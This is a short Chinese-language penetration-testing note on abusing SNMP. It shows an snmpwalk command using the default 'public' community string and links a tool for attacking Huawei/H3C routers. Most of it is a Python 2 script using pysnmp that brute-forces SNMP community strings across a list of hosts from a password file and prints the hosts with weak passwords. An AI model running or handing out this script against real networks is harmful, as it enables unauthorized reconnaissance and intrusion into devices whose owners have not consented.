snmp用來獲取信息,然后利用獲取的信息來進一步的滲透。
命令行有 snmpwalk -v 2c -c public ip system
-c是密碼,默認的密碼是public
利用工具可以找windows下的slarwinds的工具包有個叫 ip browser
如果是華為的路由器,好像部分存在漏洞,可以用老外的工具搞搞:https://github.com/grutz/h3c-pt-tools/blob/master/hh3c_cipher.py
參考文章:
http://freeloda.blog.51cto.com/2033581/1306743 ----SNMP 原理與實戰詳解
http://pysnmp.sourceforge.net/quick-start.html -----python snmp的包
http://www.wooyun.org/bugs/wooyun-2013-021964 ----烏雲漏洞參考
http://www.wooyun.org/bugs/wooyun-2010-021877 ----烏雲漏洞參考
http://drops.wooyun.org/tips/409 ----烏雲drops參考
代碼
要先安裝包
pip install pysnmp
#!/usr/local/bin/ python
# -*- coding: utf-8 -*-
__author__ = 'yangxiaodi'
from pysnmp.entity.rfc3413.oneliner import cmdgen
def read_file(filepath):
f = open(filepath).readlines()
return f
def snmp_connect(ip, key):
crack = 0
try:
errorIndication, errorStatus, errorIndex, varBinds = \
cmdgen.CommandGenerator().getCmd(
cmdgen.CommunityData('my-agent', key, 0),
cmdgen.UdpTransportTarget((ip, 161)),
(1, 3, 6, 1, 2, 1, 1, 1, 0)
)
if varBinds:
crack = 1
except:
pass
return crack
def snmp_l():
try:
host = read_file('host.txt')
for ip in host:
ip = ip.replace('\n', '')
passd = read_file('pass.txt')
for pwd in passd:
pwd = pwd.replace('\n', '')
flag = snmp_connect(ip, key=pwd)
if flag == 1:
print("%s snmp has weaken password!!-----%s\r\n" % (ip, pwd))
break
else:
print "test %s snmp's scan fail" % (ip)
except Exception, e:
pass
if __name__ == '__main__':
snmp_l()